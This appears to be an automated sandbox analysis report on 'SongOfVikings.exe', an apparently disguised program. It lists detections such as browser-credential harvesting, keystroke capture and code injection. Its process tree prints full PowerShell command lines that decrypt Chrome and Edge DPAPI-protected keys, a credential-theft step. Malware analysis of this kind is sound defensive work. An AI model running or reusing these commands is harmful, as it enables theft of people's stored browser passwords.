Edit tour
Windows
Analysis Report
SongOfVikings.exe
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- SongOfVikings.exe (PID: 7256 cmdline:
"C:\Users\ user\Deskt op\SongOfV ikings.exe " MD5: E66FB39C07D4E01D713FBAC743F4CED7)
- SongOfVikings.exe (PID: 7752 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\So ngOfViking s\SongOfVi kings.exe" MD5: B70DAA1BF6AF8358653105CA09FD384B) - cmd.exe (PID: 8128 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 8180 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 1868 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7172 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 6664 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,236,112, 27,63,29,4 5,147,76,1 54,28,167, 163,109,16 6,140,139, 16,0,0,0,2 8,0,0,0,71 ,0,111,0,1 11,0,103,0 ,108,0,101 ,0,32,0,67 ,0,104,0,1 14,0,111,0 ,109,0,101 ,0,0,0,16, 102,0,0,0, 1,0,0,32,0 ,0,0,162,2 23,64,66,6 7,235,252, 176,134,0, 234,34,88, 190,96,79, 120,163,57 ,223,70,18 4,59,55,25 1,103,80,6 6,213,41,7 9,203,0,0, 0,0,14,128 ,0,0,0,2,0 ,0,32,0,0, 0,65,3,137 ,251,132,6 7,165,117, 37,32,77,1 56,77,25,1 14,22,240, 181,235,10 3,91,102,1 17,255,144 ,36,92,249 ,151,253,6 0,75,48,0, 0,0,43,225 ,223,217,1 51,30,78,1 84,8,140,2 33,239,111 ,191,100,2 51,188,228 ,105,81,24 5,79,114,2 15,91,96,1 12,252,70, 126,43,40, 253,217,12 3,23,241,1 00,8,207,1 53,67,107, 184,161,11 3,210,62,6 4,0,0,0,16 ,48,146,16 ,208,228,7 6,223,250, 118,61,199 ,169,142,1 8,65,154,3 0,229,124, 35,149,206 ,81,42,123 ,202,212,1 01,122,75, 162,189,11 3,249,192, 143,80,146 ,46,12,170 ,101,4,63, 156,140,20 1,97,222,2 42,144,253 ,193,232,1 62,242,114 ,34,110,10 2,135,201, 250), $nul l, 'Curren tUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3228 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,236,11 2,27,63,29 ,45,147,76 ,154,28,16 7,163,109, 166,140,13 9,16,0,0,0 ,28,0,0,0, 71,0,111,0 ,111,0,103 ,0,108,0,1 01,0,32,0, 67,0,104,0 ,114,0,111 ,0,109,0,1 01,0,0,0,1 6,102,0,0, 0,1,0,0,32 ,0,0,0,162 ,223,64,66 ,67,235,25 2,176,134, 0,234,34,8 8,190,96,7 9,120,163, 57,223,70, 184,59,55, 251,103,80 ,66,213,41 ,79,203,0, 0,0,0,14,1 28,0,0,0,2 ,0,0,32,0, 0,0,65,3,1 37,251,132 ,67,165,11 7,37,32,77 ,156,77,25 ,114,22,24 0,181,235, 103,91,102 ,117,255,1 44,36,92,2 49,151,253 ,60,75,48, 0,0,0,43,2 25,223,217 ,151,30,78 ,184,8,140 ,233,239,1 11,191,100 ,251,188,2 28,105,81, 245,79,114 ,215,91,96 ,112,252,7 0,126,43,4 0,253,217, 123,23,241 ,100,8,207 ,153,67,10 7,184,161, 113,210,62 ,64,0,0,0, 16,48,146, 16,208,228 ,76,223,25 0,118,61,1 99,169,142 ,18,65,154 ,30,229,12 4,35,149,2 06,81,42,1 23,202,212 ,101,122,7 5,162,189, 113,249,19 2,143,80,1 46,46,12,1 70,101,4,6 3,156,140, 201,97,222 ,242,144,2 53,193,232 ,162,242,1 14,34,110, 102,135,20 1,250), $n ull, 'Curr entUser') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7344 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,236,112, 27,63,29,4 5,147,76,1 54,28,167, 163,109,16 6,140,139, 16,0,0,0,1 0,0,0,0,69 ,0,100,0,1 03,0,101,0 ,0,0,16,10 2,0,0,0,1, 0,0,32,0,0 ,0,177,111 ,46,150,21 2,157,15,4 ,228,252,1 2,0,1,183, 251,108,66 ,54,253,18 9,23,124,8 6,207,222, 56,201,250 ,182,152,2 21,247,0,0 ,0,0,14,12 8,0,0,0,2, 0,0,32,0,0 ,0,178,13, 225,93,214 ,215,151,1 62,72,143, 194,133,19 0,22,214,1 49,170,149 ,74,147,55 ,106,15,18 0,131,73,1 96,197,128 ,118,103,8 9,48,0,0,0 ,94,206,24 2,8,29,35, 27,71,101, 58,135,55, 188,69,108 ,246,46,23 2,119,93,6 5,217,99,7 ,252,165,3 3,164,119, 40,187,209 ,190,181,2 21,12,22,1 10,211,109 ,137,129,9 8,159,150, 234,140,24 4,64,0,0,0 ,160,185,2 10,147,25, 143,46,73, 184,87,79, 38,71,228, 189,220,24 9,51,245,1 32,106,162 ,213,227,4 5,47,24,17 1,45,48,70 ,50,96,105 ,2,105,84, 9,7,23,200 ,91,89,93, 224,1,154, 41,99,254, 68,168,144 ,46,197,12 6,233,182, 158,66,11, 216,163,15 7), $null, 'CurrentU ser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2836 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7416 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,236,11 2,27,63,29 ,45,147,76 ,154,28,16 7,163,109, 166,140,13 9,16,0,0,0 ,10,0,0,0, 69,0,100,0 ,103,0,101 ,0,0,0,16, 102,0,0,0, 1,0,0,32,0 ,0,0,177,1 11,46,150, 212,157,15 ,4,228,252 ,12,0,1,18 3,251,108, 66,54,253, 189,23,124 ,86,207,22 2,56,201,2 50,182,152 ,221,247,0 ,0,0,0,14, 128,0,0,0, 2,0,0,32,0 ,0,0,178,1 3,225,93,2 14,215,151 ,162,72,14 3,194,133, 190,22,214 ,149,170,1 49,74,147, 55,106,15, 180,131,73 ,196,197,1 28,118,103 ,89,48,0,0 ,0,94,206, 242,8,29,3 5,27,71,10 1,58,135,5 5,188,69,1 08,246,46, 232,119,93 ,65,217,99 ,7,252,165 ,33,164,11 9,40,187,2 09,190,181 ,221,12,22 ,110,211,1 09,137,129 ,98,159,15 0,234,140, 244,64,0,0 ,0,160,185 ,210,147,2 5,143,46,7 3,184,87,7 9,38,71,22 8,189,220, 249,51,245 ,132,106,1 62,213,227 ,45,47,24, 171,45,48, 70,50,96,1 05,2,105,8 4,9,7,23,2 00,91,89,9 3,224,1,15 4,41,99,25 4,68,168,1 44,46,197, 126,233,18 2,158,66,1 1,216,163, 157), $nul l, 'Curren tUser') MD5: 04029E121A0CFA5991749937DD22A1D9) - SongOfVikings.exe (PID: 2060 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\So ngOfViking s\SongOfVi kings.exe" --type=gp u-process --user-dat a-dir="C:\ Users\user \AppData\R oaming\Son gOfVikings " --gpu-pr eferences= UAAAAAAAAA DgAAAYAAAA AAAAAAAAAA AAAABgAAAA AAAwAAAAAA AAAAAAAAAQ AAAAAAAAAA AAAAAAAAAA AAAAABgAAA AAAAAAGAAA AAAAAAAIAA AAAAAAAAgA AAAAAAAACA AAAAAAAAA= --mojo-pl atform-cha nnel-handl e=1924 --f ield-trial -handle=19 32,i,89308 4527024662 6881,14440 7894186871 125,131072 --disable -features= SpareRende rerForSite PerProcess ,WinRetrie veSuggesti onsOnlyOnD emand /pre fetch:2 MD5: B70DAA1BF6AF8358653105CA09FD384B) - SongOfVikings.exe (PID: 7880 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\So ngOfViking s\SongOfVi kings.exe" --type=ut ility --ut ility-sub- type=netwo rk.mojom.N etworkServ ice --lang =en-GB --s ervice-san dbox-type= none --use r-data-dir ="C:\Users \user\AppD ata\Roamin g\SongOfVi kings" --m ojo-platfo rm-channel -handle=24 40 --field -trial-han dle=1932,i ,893084527 0246626881 ,144407894 186871125, 131072 --d isable-fea tures=Spar eRendererF orSitePerP rocess,Win RetrieveSu ggestionsO nlyOnDeman d /prefetc h:8 MD5: B70DAA1BF6AF8358653105CA09FD384B) - SongOfVikings.exe (PID: 7320 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\So ngOfViking s\SongOfVi kings.exe" --type=gp u-process --disable- gpu-sandbo x --use-gl =disabled --gpu-vend or-id=5140 --gpu-dev ice-id=140 --gpu-sub -system-id =0 --gpu-r evision=0 --gpu-driv er-version =10.0.1904 1.546 --us er-data-di r="C:\User s\user\App Data\Roami ng\SongOfV ikings" -- gpu-prefer ences=UAAA AAAAAADoAA AYAAAAAAAA AAAAAAAAAA BgAAAAAAAw AAAAAAAAAA AAAACQAAAA AAAAAAAAAA AAAAAAAAAA ABgAAAAAAA AAGAAAAAAA AAAIAAAAAA AAAAgAAAAA AAAACAAAAA AAAAA= --m ojo-platfo rm-channel -handle=19 04 --field -trial-han dle=1932,i ,893084527 0246626881 ,144407894 186871125, 131072 --d isable-fea tures=Spar eRendererF orSitePerP rocess,Win RetrieveSu ggestionsO nlyOnDeman d /prefetc h:2 MD5: B70DAA1BF6AF8358653105CA09FD384B)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |